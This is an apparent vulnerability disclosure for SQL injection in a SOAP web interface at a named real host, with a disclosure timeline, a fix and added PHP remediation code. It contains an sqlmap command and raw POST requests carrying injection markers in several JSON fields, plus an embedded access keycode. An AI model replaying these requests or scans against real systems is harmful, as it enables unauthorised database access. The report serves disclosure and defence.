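2014-09-02: Details sent to the vendor, awaiting vendor handling
2014-09-04: Vendor confirmed; details disclosed to the vendor only
2014-09-14: Details disclosed to core white hats and experts in related fields
2014-09-24: Details disclosed to regular white hats
2014-10-04: Details disclosed to trainee white hats
2014-10-17: Details disclosed to the public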
The vendor confirmed really quickly! I went through some of the interfaces, and SQL injection is still present.
python sqlmap.py -r abc.txt --dbms=mysql --dbs

abc.txt contains the request shown in the code below.

1. The mtype field
POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1
Host: sys.zs91.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/json; charset=utf-8
Content-Length: 430
Connection: keep-alive
User-Agent:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <doAct xmlns="http://sys.zs91.com">
      <args>{"keycode":"hxRN98VARF1BYUXo","AccountID":"282","page":"1","mtype":"865'"}</args>
      <operate>getmessinfo</operate>
    </doAct>
  </soap:Body>
</soap:Envelope>

2. Data insertion point
POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1
Host: sys.zs91.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/json; charset=utf-8
Content-Length: 524
Connection: keep-alive
User-Agent:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <doAct xmlns="http://sys.zs91.com">
      <args>{"TitleName":"全部","IpAddress":"","ParentId":"805*","CreateDate":"2014-09-02 14:06:19","AccountID":"282","PhoneType":"2","TitleId":"1056","keycode":"hxRN98VARF1BYUXo"}</args>
      <operate>flowcount</operate>
    </doAct>
  </soap:Body>
</soap:Envelope>

3. Login function
POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1
Host: sys.zs91.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/json; charset=utf-8
Content-Length: 447
Connection: keep-alive
User-Agent:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <doAct xmlns="http://sys.zs91.com">
      <args>{"AccountID":"282'","username":"13311111111","userpass":"111111","keycode":"hxRN98VARF1BYUXo"}</args>
      <operate>chklogin</operate>
    </doAct>
  </soap:Body>
</soap:Envelope>

POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1
Host: sys.zs91.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: text/json; charset=utf-8
Content-Length: 464
Connection: keep-alive
User-Agent:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <doAct xmlns="http://sys.zs91.com">
      <args>{"type":"0","MemberID":"1","AccountID":"282","page":"1","stype":"0","ShopId":"895'","keycode":"hxRN98VARF1BYUXo"}</args>
      <operate>gqlist</operate>
    </doAct>
  </soap:Body>
</soap:Envelope>

Filter the parameters that are received.
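
The remediation above, sketched as an added example that is not the vendor's code or part of the original report: the integer fields each operate carries in the captured requests are allow-listed and checked with ctype_digit(), and values reach SQL only as bound parameters. The function names, the messages table and the in-memory SQLite database standing in for the MySQL backend are assumptions.

```php
<?php
declare(strict_types=1);
// Added example (hypothetical handler, not the vendor's code). Operate and field
// names come from the captured requests; these fields must be decimal integers.
const INT_FIELDS = [
    'getmessinfo' => ['AccountID', 'page', 'mtype'],
    'flowcount'   => ['AccountID', 'ParentId', 'PhoneType', 'TitleId'],
    'chklogin'    => ['AccountID'],
    'gqlist'      => ['AccountID', 'MemberID', 'page', 'type', 'stype', 'ShopId'],
];
function parse_args(string $operate, string $json): array
{
    $fields = INT_FIELDS[$operate] ?? null;
    $args = json_decode($json, true);
    if ($fields === null || !is_array($args)) {
        throw new InvalidArgumentException('unknown operate or malformed args');
    }
    foreach ($fields as $field) {
        $value = $args[$field] ?? null;
        // ctype_digit() rejects "865'", "805*", "", signs and whitespace.
        if (!is_string($value) || !ctype_digit($value) || strlen($value) > 10) {
            throw new InvalidArgumentException("invalid $field");
        }
        $args[$field] = (int) $value;
    }
    return $args;
}
function get_messages(PDO $pdo, array $args): array
{
    // Values are bound as parameters, never concatenated into the SQL text.
    $stmt = $pdo->prepare('SELECT id, body FROM messages WHERE account_id = :acct AND mtype = :mtype');
    $stmt->execute([':acct' => $args['AccountID'], ':mtype' => $args['mtype']]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo: in-memory SQLite stands in for the MySQL backend.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE messages (id INTEGER, account_id INTEGER, mtype INTEGER, body TEXT)');
$pdo->exec("INSERT INTO messages VALUES (1, 282, 865, 'constructed row')");
foreach (['865', "865'"] as $mtype) {
    $json = json_encode(['AccountID' => '282', 'page' => '1', 'mtype' => $mtype]);
    try {
        $n = count(get_messages($pdo, parse_args('getmessinfo', $json)));
        echo "mtype=$mtype accepted, rows=$n\n";
    } catch (InvalidArgumentException $e) {
        echo "mtype=$mtype rejected: {$e->getMessage()}\n";
    }
}
```

The type check alone stops the quote and marker payloads shown in the requests, but string fields such as username and userpass cannot be type-checked this way and depend entirely on parameter binding.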

Severity: Low
Vulnerability Rank: 5
Confirmation time: 2014-09-04 15:27
We are preparing to schedule time to handle this?
None yet